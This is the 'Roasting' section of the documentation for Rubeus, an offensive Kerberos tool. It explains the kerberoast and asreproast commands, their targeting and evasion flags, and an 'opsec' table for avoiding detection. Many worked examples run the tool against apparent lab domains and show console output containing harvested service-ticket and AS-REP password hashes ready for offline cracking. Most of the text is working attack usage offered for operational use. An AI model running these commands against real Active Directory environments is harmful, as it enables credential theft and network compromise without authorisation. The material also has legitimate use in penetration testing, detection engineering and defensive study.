Roasting
Breakdown of the roasting commands:
Command
Description
kerberoast
Perform Kerberoasting against all (or specified) users
asreproast
Perform AS-REP roasting against all (or specified) users
kerberoast
The kerberoast action replaces the SharpRoast project's functionality. Like SharpRoast, this action uses the KerberosRequestorSecurityToken.GetRequest Method()(https://msdn.microsoft.com/en-us/library/system.identitymodel.tokens.kerberosrequestorsecuritytoken.getrequest(v=vs.110).aspx) method that was contributed to PowerView by @machosec in order to request the proper service ticket (for default behavior, opsec table for more detail). Unlike SharpRoast, this action now performs proper ASN.1 parsing of the result structures.
With no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, requesting their highest supported encryption type (see the opsec table). The /spn:X argument roasts just the specified SPN, the /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specific OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.
The /stats flag will output statistics about kerberoastable users found, including a breakdown of supported encryption types and years user passwords were last set. This flag can be combined with other targeting options.
The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.
If the /simple flag is specified, roasted hashes will be output to the console, one per line.
If the /nowrap flag is specified, Kerberoast results will not be line-wrapped.
If the the TGT /ticket:X supplied (base64 encoding of a .kirbi file or the path to a .kirbi file on disk) that TGT is used to request the service service tickets during roasting. If /ticket:X is used with /spn:Y or /spns:Y (/spns: can be a file containing each SPN on a new line or a comma-separated list) then no LDAP searching happens for users, so it can be done from a non-domain joined system in conjunction with /dc:Z.
If the /tgtdeleg flag is supplied, the tgtdeleg trick it used to get a usable TGT for the current user, which is then used for the roasting requests. If this flag is used, accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.
If the /aes flag is supplied, accounts with AES encryption enabled in msDS-SupportedEncryptionTypes are enumerated and AES service tickets are requested.
If the /ldapfilter:X argument is supplied, the supplied LDAP filter will be added to the final LDAP query used to find Kerberoastable users.
If the /rc4opsec flag is specified, the tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted.
If you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.
If the /pwdsetafter:MM-dd-yyyy argument is supplied, only accounts whose password was last changed after MM-dd-yyyy will be enumerated and roasted.
If the /pwdsetbefore:MM-dd-yyyy argument is supplied, only accounts whose password was last changed before MM-dd-yyyy will be enumerated and roasted.
If the /resultlimit:NUMBER argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.
If the /delay:MILLISECONDS argument is specified, that number of milliseconds is paused between TGS requests. The /jitter:1-100 flag can be combined for a % jitter.
If the /enterprise flag is used, the spn is assumed to be an enterprise principal (i.e. user@domain.com). This flag only works when kerberoasting with a TGT.
If the /autoenterprise flag is used, if roasting an SPN fails (due to an invalid or duplicate SPN) Rubeus will automatically retry using the enterprise principal. This is only useful when /spn or /spns is not supplied as Rubeus needs to know the target accounts samaccountname, which it gets when querying LDAP for the account information.
kerberoasting opsec
Here is a table comparing the behavior of various flags from an opsec perspective:
Arguments
Description
none
Use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption
/tgtdeleg
Use the tgtdeleg trick to perform TGS-REQ requests of RC4-enabled accounts, roast all accounts w/ RC4 specified
/ticket:X
Use the supplied TGT blob/file for TGS-REQ requests, roast all accounts w/ RC4 specified
/rc4opsec
Use the tgtdeleg trick, enumerate accounts without AES enabled, roast w/ RC4 specified
/aes
Enumerate accounts with AES enabled, use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption
/aes /tgtdeleg
Use the tgtdeleg trick, enumerate accounts with AES enabled, roast w/ AES specified
/pwdsetafter:X
Use the supplied date and only enumerate accounts with password last changed after that date
/pwdsetbefore:X
Use the supplied date and only enumerate accounts with password last changed before that date
/resultlimit:X
Use the specified number to limit the accounts that will be roasted
Examples
Kerberoasting all users in the current domain using the default KerberosRequestorSecurityToken.GetRequest method:
C:\Rubeus>Rubeus.exe kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Kerberoasting
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName : asdf/asdfasdf
[*] Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$AE5F019D4CDED6CD74830CC...(snip)...
[*] SamAccountName : sqlservice
[*] DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName : MSSQLSvc/SQL.testlab.local
[*] Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$E2B3869290...(snip)...
...(snip)...Kerberoasting all users in a specific OU, saving the hashes to an output file:
C:\Rubeus>Rubeus.exe kerberoast /ou:OU=TestingOU,DC=testlab,DC=local /outfile:C:\Temp\hashes.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Kerberoasting
[*] Target OU : OU=TestingOU,DC=testlab,DC=local
[*] SamAccountName : testuser2
[*] DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
[*] ServicePrincipalName : service/host
[*] Hash written to C:\Temp\hashes.txt
[*] Roasted hashes written to : C:\Temp\hashes.txtPerform Kerberoasting using the tgtdeleg trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:
C:\Rubeus>Rubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010
[*] Up to 3 result(s) will be returned
[*] Total kerberoastable users : 3
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,OU=TestOU,DC=theshire,DC=local
[*] ServicePrincipalName : testspn/server
[*] PwdLastSet : 5/31/2008 12:00:02 AM
[*] Supported ETypes : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)...
[*] SamAccountName : constraineduser
[*] DistinguishedName : CN=constraineduser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName : blah/blah123
[*] PwdLastSet : 9/5/2009 7:48:50 PM
[*] Supported ETypes : RC4_HMAC
[*] Hash : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)...
[*] SamAccountName : newuser
[*] DistinguishedName : CN=newuser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName : blah/blah123456
[*] PwdLastSet : 9/12/2008 8:05:16 PM
[*] Supported ETypes : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)...List statistics about found Kerberoastable accounts without actually sending ticket requests:
C:\Rubeus>Rubeus.exe kerberoast /stats
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] Listing statistics about target users, no ticket requests being performed.
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 4
----------------------------------------------------------------------
| Supported Encryption Type | Count |
----------------------------------------------------------------------
| RC4_HMAC_DEFAULT | 1 |
| RC4_HMAC | 1 |
| AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 |
| RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 |
----------------------------------------------------------------------
----------------------------------
| Password Last Set Year | Count |
----------------------------------
| 2019 | 4 |
----------------------------------Kerberoasting a specific user, with simplified hash output:
C:\Rubeus>Rubeus.exe kerberoast /user:harmj0y /simple
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target User : harmj0y
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 1
$krb5tgs$18$*harmj0y$theshire.local$testspn/server*$F63783C58AA153F24DFCC796A120C55C$06C6929374A2D3...(snip)...Kerberoasting all users in a foreign trusting domain, not line-wrapping the results:
C:\Rubeus>Rubeus.exe kerberoast /domain:dev.testlab.local /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] Target Domain : dev.testlab.local
[*] SamAccountName : jason
[*] DistinguishedName : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
[*] ServicePrincipalName : test/test
[*] Hash : $krb5tgs$23$*$dev.testlab.local$test/test@dev.testlab.local*$969339A82...(snip)...Kerberoasting using an existing TGT:
C:\Rubeus>Rubeus.exe kerberoast /ticket:doIFujCCBbagAwIBBaEDAgEWoo...(snip)... /spn:"asdf/asdfasdf" /dc:primary.testlab.local
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.5
[*] Action: Kerberoasting
[*] Using a TGT /ticket to request service tickets
[*] Target SPN : asdf/asdfasdf
[*] Hash : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$4EFF99FDED690AB4616EB...(snip)..."Opsec" Kerberoasting, using the tgtdeleg trick, filtering out AES-enabled accounts:
C:\Rubeus>Rubeus.exe kerberoast /rc4opsec
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.6
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Found 6 users to Kerberoast!
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName : asdf/asdfasdf
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)...asreproast
The asreproast action replaces the ASREPRoast project which executed similar actions with the (larger sized) BouncyCastle library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting. For more technical information, see this post.
Just as with the kerberoast command, if no other arguments are supplied, all user accounts not requiring with Kerberos preauth not required are roasted. The /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specific OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.
The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.
Also, if you wanted to use alternate domain credentials for kerberoasting, that can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.
The output /format:X defaults to John the Ripper (Jumbo version). /format:hashcat is also an option for the new hashcat mode 18200.
AS-REP roasting all users in the current domain:
C:\Rubeus>Rubeus.exe asreproast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: AS-REP roasting
[*] Target Domain : testlab.local
[*] SamAccountName : dfm.a
[*] DistinguishedName : CN=dfm.a,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\dfm.a'
[*] Connecting to 192.168.52.100:88
[*] Sent 163 bytes
[*] Received 1537 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$dfm.a@testlab.local:D4A4BC281B200EE35CBF4A4537792D07$D655...(snip)...
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$TestOU3user@testlab.local:DD6DF16B7E65223679CD703837C94FB...(snip)..
[*] SamAccountName : harmj0y2
[*] DistinguishedName : CN=harmj0y2,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\harmj0y2'
[*] Connecting to 192.168.52.100:88
[*] Sent 166 bytes
[*] Received 1407 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$harmj0y2@testlab.local:7D2E379A076BB804AF275ED51B86BF85$8...(snip)..AS-REP roasting all users in a specific OU, saving the hashes to an output file in Hashcat format:
C:\Rubeus>Rubeus.exe asreproast /ou:OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local /format:hashcat /outfile:C:\Temp\hashes.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: AS-REP roasting
[*] Target OU : OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Target Domain : testlab.local
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Temp\hashes.txt
[*] Roasted hashes written to : C:\Temp\hashes.txtAS-REP roasting a specific user:
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: AS-REP roasting
[*] Target User : TestOU3user
[*] Target Domain : testlab.local
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...AS-REP roasting all users in a foreign trusting domain:
C:\Rubeus>Rubeus.exe asreproast /domain:dev.testlab.local
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: AS-REP roasting
[*] Target Domain : dev.testlab.local
[*] SamAccountName : devuser3
[*] DistinguishedName : CN=devuser3,CN=Users,DC=dev,DC=testlab,DC=local
[*] Using domain controller: dev.testlab.local (192.168.52.105)
[*] Building AS-REQ (w/o preauth) for: 'dev.testlab.local\devuser3'
[*] Connecting to 192.168.52.105:88
[*] Sent 175 bytes
[*] Received 1448 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$devuser3@dev.testlab.local:650B881E44B92FB6A378DD21E8B020...(snip)...AS-REP roasting users in a foreign non-trusting domain using alternate credentials:
C:\Rubeus>Rubeus.exe asreproast /domain:external.local /creduser:"EXTERNAL.local\administrator" /credpassword:"Password123!"
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: AS-REP roasting
[*] Target Domain : external.local
[*] Using alternate creds : EXTERNAL.local\administrator
[*] SamAccountName : david
[*] DistinguishedName : CN=david,CN=Users,DC=external,DC=local
[*] Using domain controller: external.local (192.168.52.95)
[*] Building AS-REQ (w/o preauth) for: 'external.local\david'
[*] Connecting to 192.168.52.95:88
[*] Sent 165 bytes
[*] Received 1376 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$david@external.local:9F5A33465C53056F17FEFDF09B7D36DD$47DBAC3...(snip)...Last updated